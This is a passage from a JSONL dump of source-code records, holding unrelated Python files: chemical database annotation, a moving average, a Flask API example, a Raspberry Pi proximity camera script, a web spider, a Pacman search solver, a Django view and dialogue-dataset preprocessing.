interesting_keys = chemical_annotator.config['CHEBI']['keys']\n# lines = chebisdf.split('\\n')\n# count = 0\n# for line in lines:\n# if '$$$$' in line:\n# chebi_set = chebi_sdf_entry_to_dict(chunk, interesting_keys=interesting_keys)\n# chunk = []\n# result_buffer[chebi_set[0]] = chebi_set[1]\n# if len(result_buffer) == num_request_per_round:\n# chebi_role_data = loop.run_until_complete(make_uberon_role_queries(result_buffer.keys(), chemical_annotator))\n# for entry in merge_roles_and_annotations(chebi_role_data, result_buffer):\n# # entry[0] is the chebi id\n# rosetta.cache.set(f'annotation({Text.upper_curie(entry[0])})', entry[1])\n# # clear buffer\n# count += 1\n# result_buffer = {}\n# logger.debug(f'cached {count} entries... ')\n# else:\n# if line != '\\n':\n# line = line.strip('\\n')\n# chunk += [line]\n#\n# if len(result_buffer) != 0 :\n# #deal with the last pieces left in the buffer\n# chebi_role_data = loop.run_until_complete(make_uberon_role_queries(result_buffer.keys(),chemical_annotator))\n# for entry in merge_roles_and_annotations(chebi_role_data, result_buffer):\n# rosetta.cache.set(f'annotation({Text.upper_curie(entry[0])})', entry[1])\n# logger.debug('done caching chebi annotations...')\n# loop.close()\n\ndef chebi_sdf_entry_to_dict(sdf_chunk, interesting_keys={}):\n \"\"\"\n Converts each SDF entry to a dictionary\n \"\"\"\n final_dict = {}\n current_key = 'mol_file'\n chebi_id = ''\n for line in sdf_chunk:\n if len(line):\n if '>' == line[0]:\n current_key = line.replace('>', '').replace('<', '').strip().replace(' ', '').lower()\n current_key = 'formula' if current_key == 'formulae' else current_key\n if current_key in interesting_keys:\n final_dict[interesting_keys[current_key]] = ''\n continue\n if current_key == 'chebiid':\n chebi_id = line\n if current_key in interesting_keys:\n final_dict[interesting_keys[current_key]] += line\n return (chebi_id, final_dict)\n\n\n#async def make_multiple_chembl_requests(num_requests=100, start=0):\n# \"\"\"\n# Fetches 1000 records per request beginning from 'start' till 'num_requests' * 1000\n# \"\"\"\n# tasks = []\n# for i in range(0, num_requests):\n# offset = i * 1000 + start # chebml api returns 1000 records max\n# url = f\"https://www.ebi.ac.uk/chembl/api/data/molecule?format=json&limit=0&offset={offset}\"\n# tasks.append(async_client.async_get_json(url, {}))\n# results = await asyncio.gather(*tasks)\n# return results\n#\n#\n#def annotate_from_chembl(rosetta):\n# \"\"\"\n# Gets and caches chembl annotations.\n# \"\"\"\n# j = 100 # assume first that we can finish the whole thing with 100 rounds of 100 request for each round\n# all_results = []\n# logger.debug('annotating chembl data')\n# annotator = ChemicalAnnotator(rosetta)\n# for i in range(0, j):\n# # open the loop\n# loop = asyncio.new_event_loop()\n# num_requests = 100\n# start = (num_requests * 1000) * i\n# results = loop.run_until_complete(make_multiple_chembl_requests(num_requests=num_requests, start=start))\n# loop.close()\n# if i == 0:\n# # determine the actual number of records to not just guess when we should stop\n# total_count = results[0]['page_meta']['total_count']\n# j = round(total_count / (1000 * num_requests))\n# for result in results:\n# extract_chebml_data_add_to_cache(result, annotator, rosetta)\n# logger.debug(f'done annotating {(i / j) * 100} % of chembl')\n#\n# logger.debug('caching chebml stuff done...')\n\n\ndef extract_chebml_data_add_to_cache(result, annotator, rosetta):\n \"\"\"\n Helper function to parse out and extract useful info form a single 
request result from chebml api.\n \"\"\"\n molecules = result['molecules']\n for molecule in molecules:\n extract = annotator.extract_chembl_data(molecule, annotator.get_prefix_config('CHEMBL.COMPOUND')['keys'])\n #logger.debug(extract)\n chembl_id = molecule['molecule_chembl_id']\n rosetta.cache.set(f\"annotation({Text.upper_curie(chembl_id)})\", extract)\n\n\n#def load_annotations_chemicals(rosetta):\n# annotate_from_chebi(rosetta)\n# annotate_from_chembl(rosetta)\n\ndef kegg_stand():\n print('kegg')\n kname = make_local_name('kegg.pickle')\n #to refresh kegg:\n keggs,kegg_labels = pull_kegg_compounds()\n with open(kname,'wb') as kf:\n pickle.dump((keggs,kegg_labels),kf)\n\n\n#######\n# Main - Stand alone entry point for testing\n#######\nif __name__ == '__main__':\n #load_chemicals(refresh_mesh=False,refresh_uniprot=True,refresh_pubchem=True,refresh_chembl=True)\n load_chemicals(refresh_mesh=False,refresh_uniprot=False,refresh_pubchem=False,refresh_chembl=False)\n #load_unichem(working_dir='.',xref_file='UC_XREF.txt.gz',struct_file='UC_STRUCTURE.txt')\n","sub_path":"babel/chemicals.py","file_name":"chemicals.py","file_ext":"py","file_size_in_byte":28125,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"77417818","text":"\"\"\"A collection of different types of moving averages.\"\"\"\nimport pandas as pd\n\n\ndef simple_moving_average(data_frame, data_column, window):\n \"\"\"Take the Simple Moving Average of the pandas dataframe.\"\"\"\n # Checking data_frame\n if not isinstance(data_frame, pd.DataFrame):\n raise TypeError(\"The data_frame has to be a pandas.DataFrame.\")\n\n # Checking column\n if not isinstance(data_column, (str)):\n raise TypeError(\"The data_column must be a string.\")\n elif data_column not in data_frame.columns:\n raise ValueError(\"The data_column does not exist in the data frame.\")\n\n # Checking window\n if isinstance(window, (bool)) or not isinstance(window, (int)):\n raise TypeError(\"The window must be an integer greater than zero.\")\n elif window < 1 or window > len(data_frame):\n raise ValueError('The window={} has to be between 1 and len(df).'\n .format(window))\n\n if data_frame.index.is_monotonic_increasing:\n simple_rolling = data_frame[data_column].rolling(window=window).mean()\n else:\n simple_rolling = data_frame[data_column].rolling(\n window=window).mean().shift(-(window-1))\n\n data_frame['SMA_{}'.format(window)] = simple_rolling\n\n return data_frame\n\n\ndef exponential_moving_average():\n \"\"\"Take the Exponential Moving Average of the pandas dataframe.\"\"\"\n raise NotImplementedError\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"moving_average.py","file_name":"moving_average.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"583100299","text":"from flask_restplus import Namespace, Resource, fields, marshal\n\napi = Namespace('Module', description='Module API Description')\n\nitems = [\n {'id': 1, 'message': 'success', 'data': 'this'},\n {'id': 2, 'message': 'failure', 'data': 'that'},\n {'id': 3, 'message': 'partial', 'data': 'the other'},\n]\n\nModel = api.model('Model', {\n 'id': fields.Integer(readonly=True, default=lambda: max([d['id'] for d in items]) + 1),\n 'message': fields.String(required=True, enum=['success', 'failure', 'partial']),\n 'data': fields.String(required=True, example='whatever')\n})\n\n\n@api.route('/')\nclass Endpoint(Resource):\n @api.marshal_with(Model, 
as_list=True)\n def get(self):\n \"\"\"Retrieve data\n\n Describe interesting details about endpoints here.\n\n You can also use [Markdown](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet)\"\"\"\n\n return items\n\n @api.expect(Model, validate=True)\n @api.marshal_with(Model, as_list=False)\n def post(self):\n \"\"\"Submit data\"\"\"\n\n data = marshal(api.payload, Model)\n items.append(data)\n return data\n","sub_path":"resources/module.py","file_name":"module.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"449730402","text":"#!/usr/bin/env python\n\nimport time\nimport sys\nimport os\nimport datetime\nimport RPi.GPIO as gpio\n\n# Set the mode to BCM (mode = BOARD is not working!!)\ngpio.setmode(gpio.BCM)\n\n#Setup the temperature channel as input\ngpio.setup(4, gpio.IN)\n\n#Setup the proximity sensor channel as input\ngpio.setup(27, gpio.IN)\n\n#Add proximity event on rising edge\ngpio.add_event_detect(27, gpio.RISING)\n\ntry:\n while True:\n gpio.wait_for_edge(27, gpio.RISING)\n ts = time.time()\n print(\"Received proximity warning at \" + datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S'))\n os.system(\"fswebcam -r 960x720 /home/pi/webcam/proximity_warning.jpg\")\n execfile(\"TweetPic.py\") \nexcept KeyboardInterrupt:\n print(\"Received keyboard interrupt, stopping proximity sensing...\") \n\n\n\n#Print Raspberry Pi informationa nd GPIO module information\n#print(gpio.RPI_INFO, gpio.VERSION)\n#DEBUG\n#print(gpio.getmode(), gpio.gpio_function(4), gpio.gpio_function(27))\n\n#try:\n# while True:\n# if gpio.event_detected(27):\n# print(\"Received proximity warning!\")\n# fswebcam -r 960x720 /home/pi/webcam/proximity_warning.jpg\n# execfile(\"TweetPic.py\") \n#except KeyboardInterrupt:\n# print(\"Received keyboard interrupt, stopping proximity sensing...\") \n\n","sub_path":"HomeSecurity/secure.py","file_name":"secure.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"579368780","text":"# coding: utf-8\nfrom spider import html_downloader\nfrom spider import url_manager\nfrom spider import html_parser\nfrom spider import findPlacesNameEntity1\nfrom spider import findPlacesNameEntity2\nclass Spider():\n\n def __init__(self):\n self.downloader = html_downloader.HtmlDownloader()\n self.url_manager = url_manager.UrlManager()\n self.html_parser = html_parser.HtmlParser()\n\n def craw(self, root_url):\n count = 1\n result = []\n self.url_manager.add_new_url(root_url)\n segmentor, postagger, recognizer = findPlacesNameEntity1.getLtpSegmentorPostaggerRecognizer()\n f = open('text.txt', 'w+', encoding='utf-8')\n while self.url_manager.has_new_url():\n try:\n new_url = self.url_manager.get_new_url()\n html_content = self.downloader.download(new_url)\n new_urls, new_datas = self.html_parser.parse(new_url, html_content)\n self.url_manager.add_new_urls(new_urls)\n for data in new_datas.values():\n # result = findPlacesNameEntity.findByLtp(data, segmentor, postagger, recognizer)\n # print(result)\n # print(len(data))\n # if len(data) > 4995*3:\n # data1 = data[:4995]\n # data2 = data[4995:]\n # f.write(data1 + '\\n')\n # f.write(data2 + '\\n')\n # print(data)\n f.write(data + '\\n')\n tmp = findPlacesNameEntity2.findByBoson(data)\n if len(tmp) != 0:\n result.extend(tmp)\n # print(result)\n # result = findPlacesNameEntity.findByLtp(data, segmentor, postagger, recognizer)\n # 
print(result)\n # print(new_datas)\n # open('text.txt', encoding=)\n self.url_manager.old_urls.add(new_url)\n count += 1\n if count == 100:\n break\n except:\n print('crawl failed')\n result = findPlacesNameEntity2.getUniqueData(result)\n\n # result = findPlacesNameEntity.findByLtp(data, segmentor, postagger, recognizer)\n print(result)\n\nif __name__ == '__main__':\n root_url = 'http://travel.kunming.cn/cykm/'\n spider = Spider()\n spider.craw(root_url)\n # result = findPlacesNameEntity2.findByLtp()\n # print(result)\n","sub_path":"test/spider/spider_main.py","file_name":"spider_main.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"}\n{"seq_id":"100885819","text":"pacman = list(map(int,input().split()))\nfood = list(map(int,input().split()))\nboard_size = list(map(int,input().split()))\nboard = [input() for _ in range(board_size[0])]\nvis = [[0 for _ in range(board_size[1])] for _ in range(board_size[0])]\ndx = [-1,0,0,1]\ndy = [0,-1,1,0]\nroad = [[pacman[0],pacman[1]]]\nans = []\ndef dfs(r,c,road):\n global ans\n if board[r][c]==\".\":\n if not ans or len(ans)>len(road):\n ans = road\n vis[r][c]=0\n return\n for i in range(4):\n if board[r+dx[i]][c+dy[i]]!=\"%\" and vis[r+dx[i]][c+dy[i]]!=1:\n vis[r+dx[i]][c+dy[i]]=1\n dfs(r+dx[i],c+dy[i],road + [[r+dx[i],c+dy[i]]])\n vis[r][c]=0\n return\ndfs(pacman[0],pacman[1],road)\nprint(len(ans))\nfor a in ans:\n print(a[0],a[1])\n","sub_path":"Artificial_Intelligence/A_search/Pacman_dfs.py","file_name":"Pacman_dfs.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}\n{"seq_id":"106486977","text":"from django.shortcuts import render\nfrom review.models import Submit\n# Create your views here.\n#business logic that runs after a review is submitted\ndef submit(request):\n #get the username\n username = request.session.get('username')\n #get the data posted by the form\n if request.method == 'POST':\n qq = request.POST.get('q')\n review = request.POST.get('r')\n try:\n model = Submit(username=username,qq=qq,review=review)\n model.save()\n except:\n print(\">>>>>\")\n print(\"connection failed\")\n #store it in the database\n return render(request,'test.html',{'username':username})\n","sub_path":"review/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}\n{"seq_id":"436263707","text":"import json, os, re, copy, zipfile\nimport spacy\nimport ontology, utils\nfrom collections import OrderedDict\nfrom tqdm import tqdm\nfrom config import global_config as cfg\nfrom db_ops import MultiWozDB\nfrom clean_dataset import clean_slot_values, clean_text\n\n\ndef get_db_values(value_set_path):\n processed = {}\n bspn_word = []\n nlp = spacy.load('en_core_web_sm')\n\n with open(value_set_path, 'r', encoding='utf8') as f:\n value_set = json.loads(f.read().lower())\n\n with open('db/ontology.json', 'r', encoding='utf8') as f:\n otlg = json.loads(f.read().lower())\n\n for domain, slots in value_set.items():\n processed[domain] = {}\n bspn_word.append('['+domain+']')\n for slot, values in slots.items():\n s_p = ontology.normlize_slot_names.get(slot, slot)\n if s_p in ontology.informable_slots[domain]:\n bspn_word.append(s_p)\n processed[domain][s_p] = []\n\n for domain, slots in value_set.items():\n for slot, values in slots.items():\n s_p = ontology.normlize_slot_names.get(slot, slot)\n if s_p in ontology.informable_slots[domain]:\n for v in values:\n
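 #normalize each raw DB value before tokenization and vocab collection below\n _, v_p = 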
clean_slot_values(domain, slot, v)\n v_p = ' '.join([token.text for token in nlp(v_p)]).strip()\n processed[domain][s_p].append(v_p)\n for x in v_p.split():\n if x not in bspn_word:\n bspn_word.append(x)\n\n for domain_slot, values in otlg.items():\n domain, slot = domain_slot.split('-')\n if domain == 'bus':\n domain = 'taxi'\n if slot == 'price range':\n slot = 'pricerange'\n if slot == 'book stay':\n slot = 'stay'\n if slot == 'book day':\n slot = 'day'\n if slot == 'book people':\n slot = 'people'\n if slot == 'book time':\n slot = 'time'\n if slot == 'arrive by':\n slot = 'arrive'\n if slot == 'leave at':\n slot = 'leave'\n if slot == 'leaveat':\n slot = 'leave'\n if slot not in processed[domain]:\n processed[domain][slot] = []\n bspn_word.append(slot)\n for v in values:\n _, v_p = clean_slot_values(domain, slot, v)\n v_p = ' '.join([token.text for token in nlp(v_p)]).strip()\n if v_p not in processed[domain][slot]:\n processed[domain][slot].append(v_p)\n for x in v_p.split():\n if x not in bspn_word:\n bspn_word.append(x)\n\n with open(value_set_path.replace('.json', '_processed.json'), 'w', encoding='utf8') as f:\n json.dump(processed, f, indent=2, ensure_ascii=False)\n with open('data/multi-woz-processed/bspn_word_collection.json', 'w', encoding='utf8') as f:\n json.dump(bspn_word, f, indent=2, ensure_ascii=False)\n\n print('DB value set processed! ')\n\ndef preprocess_db(db_paths):\n dbs = {}\n nlp = spacy.load('en_core_web_sm')\n for domain in ontology.all_domains:\n with open(db_paths[domain], 'r', encoding='utf8') as f:\n dbs[domain] = json.loads(f.read().lower())\n for idx, entry in enumerate(dbs[domain]):\n new_entry = copy.deepcopy(entry)\n for key, value in entry.items():\n if type(value) is not str:\n continue\n del new_entry[key]\n key, value = clean_slot_values(domain, key, value)\n tokenize_and_back = ' '.join([token.text for token in nlp(value)]).strip()\n new_entry[key] = tokenize_and_back\n dbs[domain][idx] = new_entry\n with open(db_paths[domain].replace('.json', '_processed.json'), 'w', encoding='utf8') as f:\n json.dump(dbs[domain], f, indent=2, ensure_ascii=False)\n print('[%s] DB processed! 
'%domain)\n\n\nclass DataPreprocessor(object):\n def __init__(self):\n self.nlp = spacy.load('en_core_web_sm')\n self.db = MultiWozDB(cfg.dbs)\n data_path = 'data/multi-woz/viwoz_2k8_mapped_vi_states_cleaned_slots.json'\n archive = zipfile.ZipFile(data_path + '.zip', 'r')\n self.convlab_data = json.loads(archive.open(data_path.split('/')[-1], 'r').read().lower())\n self.delex_sg_valdict_path = 'data/multi-woz-processed/delex_single_valdict.json'\n self.delex_mt_valdict_path = 'data/multi-woz-processed/delex_multi_valdict.json'\n self.ambiguous_val_path = 'data/multi-woz-processed/ambiguous_values.json'\n self.delex_refs_path = 'data/multi-woz-processed/reference_no.json'\n self.delex_refs = json.loads(open(self.delex_refs_path, 'r', encoding='utf8').read())\n if not os.path.exists(self.delex_sg_valdict_path):\n self.delex_sg_valdict, self.delex_mt_valdict, self.ambiguous_vals = self.get_delex_valdict()\n # else:\n self.delex_sg_valdict = json.loads(open(self.delex_sg_valdict_path, 'r', encoding='utf8').read())\n self.delex_mt_valdict = json.loads(open(self.delex_mt_valdict_path, 'r', encoding='utf8').read())\n self.ambiguous_vals = json.loads(open(self.ambiguous_val_path, 'r', encoding='utf8').read())\n\n self.vocab = utils.Vocab(cfg.vocab_size)\n\n\n def delex_by_annotation(self, dial_turn):\n u = dial_turn['text'].split()\n span = dial_turn['span_info']\n for s in span:\n slot = s[1]\n if slot == 'open':\n continue\n if ontology.da_abbr_to_slot_name.get(slot):\n slot = ontology.da_abbr_to_slot_name[slot]\n for idx in range(s[3], s[4]+1):\n u[idx] = ''\n try:\n u[s[3]] = '[value_'+slot+']'\n except:\n u[5] = '[value_'+slot+']'\n u_delex = ' '.join([t for t in u if t is not ''])\n u_delex = u_delex.replace('[value_address] , [value_address] , [value_address]', '[value_address]')\n u_delex = u_delex.replace('[value_address] , [value_address]', '[value_address]')\n u_delex = u_delex.replace('[value_name] [value_name]', '[value_name]')\n u_delex = u_delex.replace('[value_name]([value_phone] )', '[value_name] ( [value_phone] )')\n return u_delex\n\n\n def delex_by_valdict(self, text):\n text = clean_text(text)\n\n text = re.sub(r'\\d{5}\\s?\\d{5,7}', '[value_phone]', text)\n text = re.sub(r'\\d[\\s-]stars?', '[value_stars]', text)\n text = re.sub(r'\\$\\d+|\\$?\\d+.?(\\d+)?\\s(pounds?|gbps?)', '[value_price]', text)\n text = re.sub(r'tr[\\d]{4}', '[value_id]', text)\n text = re.sub(r'([a-z]{1}[\\. ]?[a-z]{1}[\\. ]?\\d{1,2}[, ]+\\d{1}[\\. ]?[a-z]{1}[\\. 
]?[a-z]{1}|[a-z]{2}\\d{2}[a-z]{2})', '[value_postcode]', text)\n\n for value, slot in self.delex_mt_valdict.items():\n text = text.replace(value, '[value_%s]'%slot)\n\n for value, slot in self.delex_sg_valdict.items():\n tokens = text.split()\n for idx, tk in enumerate(tokens):\n if tk == value:\n tokens[idx] = '[value_%s]'%slot\n text = ' '.join(tokens)\n\n for ambg_ent in self.ambiguous_vals:\n start_idx = text.find(' '+ambg_ent) # ely is a place, but appears in words like moderately\n if start_idx == -1:\n continue\n front_words = text[:start_idx].split()\n ent_type = 'time' if ':' in ambg_ent else 'place'\n\n for fw in front_words[::-1]:\n if fw in ['arrive', 'arrives', 'arrived', 'arriving', 'arrival', 'destination', 'there', 'reach', 'to', 'by', 'before']:\n slot = '[value_arrive]' if ent_type=='time' else '[value_destination]'\n text = re.sub(' '+ambg_ent, ' '+slot, text)\n elif fw in ['leave', 'leaves', 'leaving', 'depart', 'departs', 'departing', 'departure',\n 'from', 'after', 'pulls']:\n slot = '[value_leave]' if ent_type=='time' else '[value_departure]'\n text = re.sub(' '+ambg_ent, ' '+slot, text)\n\n text = text.replace('[value_car] [value_car]', '[value_car]')\n return text\n\n\n def get_delex_valdict(self, ):\n skip_entry_type = {\n 'taxi': ['taxi_phone'],\n 'police': ['id'],\n 'hospital': ['id'],\n 'hotel': ['id', 'location', 'internet', 'parking', 'takesbookings', 'stars', 'price', 'n', 'postcode', 'phone'],\n 'attraction': ['id', 'location', 'pricerange', 'price', 'openhours', 'postcode', 'phone'],\n 'train': ['price', 'id'],\n 'restaurant': ['id', 'location', 'introduction', 'signature', 'type', 'postcode', 'phone'],\n }\n entity_value_to_slot= {}\n ambiguous_entities = []\n for domain, db_data in self.db.dbs.items():\n print('Processing entity values in [%s]'%domain)\n if domain != 'taxi':\n for db_entry in db_data:\n for slot, value in db_entry.items():\n if slot not in skip_entry_type[domain]:\n if type(value) is not str:\n raise TypeError(\"value '%s' in domain '%s' should be rechecked\"%(slot, domain))\n else:\n slot, value = clean_slot_values(domain, slot, value)\n value = ' '.join([token.text for token in self.nlp(value)]).strip()\n if value in entity_value_to_slot and entity_value_to_slot[value] != slot:\n # print(value, \": \",entity_value_to_slot[value], slot)\n ambiguous_entities.append(value)\n entity_value_to_slot[value] = slot\n else: # taxi db specific\n db_entry = db_data[0]\n for slot, ent_list in db_entry.items():\n if slot not in skip_entry_type[domain]:\n for ent in ent_list:\n entity_value_to_slot[ent] = 'car'\n ambiguous_entities = set(ambiguous_entities)\n # ambiguous_entities.remove('cambridge')\n ambiguous_entities = list(ambiguous_entities)\n for amb_ent in ambiguous_entities: # departure or destination? 
arrive time or leave time?\n entity_value_to_slot.pop(amb_ent)\n entity_value_to_slot['parkside'] = 'address'\n entity_value_to_slot['parkside, cambridge'] = 'address'\n entity_value_to_slot['cambridge belfry'] = 'name'\n entity_value_to_slot['hills road'] = 'address'\n entity_value_to_slot['hills rd'] = 'address'\n entity_value_to_slot['Parkside Police Station'] = 'name'\n\n single_token_values = {}\n multi_token_values = {}\n for val, slt in entity_value_to_slot.items():\n if val in ['cambridge']:\n continue\n if len(val.split())>1:\n multi_token_values[val] = slt\n else:\n single_token_values[val] = slt\n\n with open(self.delex_sg_valdict_path, 'w', encoding='utf8') as f:\n single_token_values = OrderedDict(sorted(single_token_values.items(), key=lambda kv:len(kv[0]), reverse=True))\n json.dump(single_token_values, f, indent=2, ensure_ascii=False)\n print('single delex value dict saved!')\n with open(self.delex_mt_valdict_path, 'w', encoding='utf8') as f:\n multi_token_values = OrderedDict(sorted(multi_token_values.items(), key=lambda kv:len(kv[0]), reverse=True))\n json.dump(multi_token_values, f, indent=2, ensure_ascii=False)\n print('multi delex value dict saved!')\n with open(self.ambiguous_val_path, 'w', encoding='utf8') as f:\n json.dump(ambiguous_entities, f, indent=2, ensure_ascii=False)\n print('ambiguous value dict saved!')\n\n return single_token_values, multi_token_values, ambiguous_entities\n\n\n def preprocess_main(self, save_path=None, is_test=False):\n \"\"\"\n \"\"\"\n data = {}\n count=0\n self.unique_da = {}\n ordered_sysact_dict = {}\n for fn, raw_dial in tqdm(list(self.convlab_data.items())):\n count +=1\n # if count == 100:\n # break\n\n compressed_goal = {}\n dial_domains, dial_reqs = [], []\n for dom, g in raw_dial['goal'].items():\n if dom != 'topic' and dom != 'message' and g:\n if g.get('reqt'):\n for i, req_slot in enumerate(g['reqt']):\n if ontology.normlize_slot_names.get(req_slot):\n g['reqt'][i] = ontology.normlize_slot_names[req_slot]\n dial_reqs.append(g['reqt'][i])\n compressed_goal[dom] = g\n if dom in ontology.all_domains:\n dial_domains.append(dom)\n\n dial_reqs = list(set(dial_reqs))\n\n dial = {'goal': compressed_goal, 'log': []}\n single_turn = {}\n constraint_dict = OrderedDict()\n prev_constraint_dict = {}\n prev_turn_domain = ['general']\n ordered_sysact_dict[fn] = {}\n\n for turn_num, dial_turn in enumerate(raw_dial['log']):\n\n dial_state = dial_turn['metadata']\n if not dial_state: # user\n u = ' '.join(clean_text(dial_turn['text']).split())\n if dial_turn['span_info']:\n u_delex = clean_text(self.delex_by_annotation(dial_turn))\n else:\n u_delex = self.delex_by_valdict(dial_turn['text'])\n\n single_turn['user'] = u\n single_turn['user_delex'] = u_delex\n\n else: #system\n if dial_turn['span_info']:\n s_delex = clean_text(self.delex_by_annotation(dial_turn))\n else:\n if not dial_turn['text']:\n print(fn)\n s_delex = self.delex_by_valdict(dial_turn['text'])\n single_turn['resp'] = s_delex\n single_turn['resp_nodelex'] = ' '.join(clean_text(dial_turn['text']).split())\n\n # get belief state\n for domain in dial_domains:\n if not constraint_dict.get(domain):\n constraint_dict[domain] = OrderedDict()\n info_sv = dial_state[domain]['semi']\n for s,v in info_sv.items():\n s,v = clean_slot_values(domain, s,v)\n if len(v.split())>1:\n v = ' '.join([token.text for token in self.nlp(v)]).strip()\n if v != '':\n constraint_dict[domain][s] = v\n book_sv = dial_state[domain]['book']\n for s,v in book_sv.items():\n if s == 'booked':\n continue\n s,v = 
clean_slot_values(domain, s,v)\n if len(v.split())>1:\n v = ' '.join([token.text for token in self.nlp(v)]).strip()\n if v != '':\n constraint_dict[domain][s] = v\n\n constraints = []\n cons_delex = []\n turn_dom_bs = []\n for domain, info_slots in constraint_dict.items():\n if info_slots:\n constraints.append('['+domain+']')\n cons_delex.append('['+domain+']')\n for slot, value in info_slots.items():\n constraints.append(slot)\n constraints.extend(value.split())\n cons_delex.append(slot)\n if domain not in prev_constraint_dict:\n turn_dom_bs.append(domain)\n elif prev_constraint_dict[domain] != constraint_dict[domain]:\n turn_dom_bs.append(domain)\n\n\n sys_act_dict = {}\n turn_dom_da = set()\n for act in dial_turn['dialog_act']:\n d, a = act.split('-')\n turn_dom_da.add(d)\n turn_dom_da = list(turn_dom_da)\n if len(turn_dom_da) != 1 and 'general' in turn_dom_da:\n turn_dom_da.remove('general')\n if len(turn_dom_da) != 1 and 'booking' in turn_dom_da:\n turn_dom_da.remove('booking')\n\n # get turn domain\n turn_domain = turn_dom_bs\n for dom in turn_dom_da:\n if dom != 'booking' and dom not in turn_domain:\n turn_domain.append(dom)\n if not turn_domain:\n turn_domain = prev_turn_domain\n if len(turn_domain) == 2 and 'general' in turn_domain:\n turn_domain.remove('general')\n if len(turn_domain) == 2:\n if len(prev_turn_domain) == 1 and prev_turn_domain[0] == turn_domain[1]:\n turn_domain = turn_domain[::-1]\n\n # get system action\n for dom in turn_domain:\n sys_act_dict[dom] = {}\n add_to_last_collect = []\n booking_act_map = {'inform': 'offerbook', 'book': 'offerbooked'}\n for act, params in dial_turn['dialog_act'].items():\n if act == 'general-greet':\n continue\n d, a = act.split('-')\n if d == 'general' and d not in sys_act_dict:\n sys_act_dict[d] = {}\n if d == 'booking':\n d = turn_domain[0]\n a = booking_act_map.get(a, a)\n add_p = []\n for param in params:\n p = param[0]\n if p == 'none':\n continue\n elif ontology.da_abbr_to_slot_name.get(p):\n p = ontology.da_abbr_to_slot_name[p]\n if p not in add_p:\n add_p.append(p)\n add_to_last = True if a in ['request', 'reqmore', 'bye', 'offerbook'] else False\n if add_to_last:\n add_to_last_collect.append((d,a,add_p))\n else:\n sys_act_dict[d][a] = add_p\n for d, a, add_p in add_to_last_collect:\n sys_act_dict[d][a] = add_p\n\n for d in copy.copy(sys_act_dict):\n acts = sys_act_dict[d]\n if not acts:\n del sys_act_dict[d]\n if 'inform' in acts and 'offerbooked' in acts:\n for s in sys_act_dict[d]['inform']:\n sys_act_dict[d]['offerbooked'].append(s)\n del sys_act_dict[d]['inform']\n\n\n ordered_sysact_dict[fn][len(dial['log'])] = sys_act_dict\n\n sys_act = []\n if 'general-greet' in dial_turn['dialog_act']:\n sys_act.extend(['[general]', '[greet]'])\n for d, acts in sys_act_dict.items():\n sys_act += ['[' + d + ']']\n for a, slots in acts.items():\n self.unique_da[d+'-'+a] = 1\n sys_act += ['[' + a + ']']\n sys_act += slots\n\n\n # get db pointers\n matnums = self.db.get_match_num(constraint_dict)\n match_dom = turn_domain[0] if len(turn_domain) == 1 else turn_domain[1]\n match = matnums[match_dom]\n dbvec = self.db.addDBPointer(match_dom, match)\n bkvec = self.db.addBookingPointer(dial_turn['dialog_act'])\n\n single_turn['pointer'] = ','.join([str(d) for d in dbvec + bkvec])\n single_turn['match'] = str(match)\n single_turn['constraint'] = ' '.join(constraints)\n single_turn['cons_delex'] = ' '.join(cons_delex)\n single_turn['sys_act'] = ' '.join(sys_act)\n single_turn['turn_num'] = len(dial['log'])\n single_turn['turn_domain'] = ' 
'.join(['['+d+']' for d in turn_domain])\n\n prev_turn_domain = copy.deepcopy(turn_domain)\n prev_constraint_dict = copy.deepcopy(constraint_dict)\n\n if 'user' in single_turn:\n dial['log'].append(single_turn)\n for t in single_turn['user'].split() + single_turn['resp'].split() + constraints + sys_act:\n self.vocab.add_word(t)\n for t in single_turn['user_delex'].split():\n if '[' in t and ']' in t and not t.startswith('[') and not t.endswith(']'):\n single_turn['user_delex'] = single_turn['user_delex'].replace(t, t[t.index('['): t.index(']')+1])\n elif not self.vocab.has_word(t):\n self.vocab.add_word(t)\n\n single_turn = {}\n\n\n data[fn] = dial\n # pprint(dial)\n # if count == 20:\n # break\n self.vocab.construct()\n self.vocab.save_vocab('data/multi-woz-processed/vocab')\n with open('data/multi-woz-analysis/dialog_acts.json', 'w', encoding='utf8') as f:\n json.dump(ordered_sysact_dict, f, indent=2, ensure_ascii=False)\n with open('data/multi-woz-analysis/dialog_act_type.json', 'w', encoding='utf8') as f:\n json.dump(self.unique_da, f, indent=2, ensure_ascii=False)\n return data\n\n\nif __name__=='__main__':\n db_paths = {\n 'attraction': 'db/attraction_db.json',\n 'hospital': 'db/hospital_db.json',\n 'hotel': 'db/hotel_db.json',\n 'police': 'db/police_db.json',\n 'restaurant': 'db/restaurant_db.json',\n 'taxi': 'db/taxi_db.json',\n 'train': 'db/train_db.json',\n }\n get_db_values('db/value_set.json')\n preprocess_db(db_paths)\n dh = DataPreprocessor()\n data = dh.preprocess_main()\n if not os.path.exists('data/multi-woz-processed'):\n os.mkdir('data/multi-woz-processed')\n\n with open('data/multi-woz-processed/data_for_damd.json', 'w', encoding='utf8') as f:\n json.dump(data, f, indent=2, ensure_ascii=False)\n\n","sub_path":"damd_multiwoz/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":23337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}\n{"seq_id":"626036657","text":"import numpy as np\nimport pandas as pd\nimport csv\nimport h5py\nimport os\nfrom sklearn import model_selection\nfrom sklearn.model_selection import KFold\n\n\"\"\"\nThis script can be utilized to split a dataset into a train/validation set and subsequently split the train file into 5-fold cross validation.\nRequires the python libraries http://www.h5py.org/ and 